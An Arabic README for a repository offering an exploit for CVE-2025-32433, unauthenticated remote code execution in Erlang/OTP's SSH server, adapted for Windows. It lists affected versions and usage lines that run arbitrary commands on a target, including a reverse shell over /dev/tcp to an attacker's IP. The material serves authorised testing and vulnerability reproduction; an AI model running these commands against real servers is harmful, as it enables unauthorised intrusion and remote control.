
استنادًا إلى الإصدار الأصلي:https://github.com/vulhub/vulhub/blob/master/erlang/CVE-2025-32433/exploit.py استبدال علامة الاختيار Unicode بحرف ASCII للتوافق مع ويندوز
Erlang/OTP SSH تنفيذ تعليمات برمجية عن بُعد دون مصادقة
يحتوي هذا المستودع على استغلال لثغرة CVE-2025-32433، وهي ثغرة حرجة في تنفيذ التعليمات البرمجية عن بُعد دون مصادقة في خادم SSH الخاص بـ Erlang/OTP.
الميزات الرئيسية:
معرف CVE: CVE-2025-32433
الخطورة: حرجة
التأثير: تنفيذ تعليمات برمجية عن بُعد دون مصادقة
تسمح الثغرة للمهاجمين بتنفيذ أوامر نظام تعسفية على خوادم SSH الخاصة بـ Erlang/OTP دون مصادقة، وذلك عن طريق إرسال رسائل بروتوكول SSH مصممة خصيصًا.
OTP ≤ 27.3.2
OTP ≤ 26.2.5.10
OTP ≤ 25.3.2.19
OTP ≥ 17.0 and older (likely)
# Basic command execution
python exploit.py -t <target-ip> -p 2222 -c "whoami"
# Execute system command
python exploit.py -t 192.168.1.100 -p 2222 -c "touch /tmp/pwned"
# Raw Erlang code execution
python exploit.py -t 192.168.1.100 -p 2222 -e 'os:cmd("id").'
# Reverse shell
python exploit.py -t 192.168.1.100 -p 2222 -c "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"
-t, --target Target IP address (default: 127.0.0.1)
-p, --port Target port (default: 2222)
-c, --command System command to execute
-e, --erlang Raw Erlang code to execute
يعمل هذا الإصدار على إصلاح مشكلة الترميز الموجودة في الاستغلال الأصلي:
المشكلة: كان الاستغلال الأصلي يستخدم حرف علامة الصح الموحّد (✓, U+2713)، مما يسبب أخطاء ترميز GBK على ويندوز:
'gbk' codec can't encode character '✓' in position 1: illegal multibyte sequence
الحل: تم استبدال حرف Unicode بالحرف القياسي ASCII + لضمان التوافق عبر المنصات.
يعمل الاستغلال من خلال:
os:cmd()تم توفير هذا الاستغلال لأغراض تعليمية ولاختبار الأمان المصرَّح به فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. استخدمه بمسؤولية وفقط على الأنظمة التي لديك إذن صريح لاختبارها.
رخصة MIT
تم التعديل للتوافق مع ويندوز بواسطة chuzouX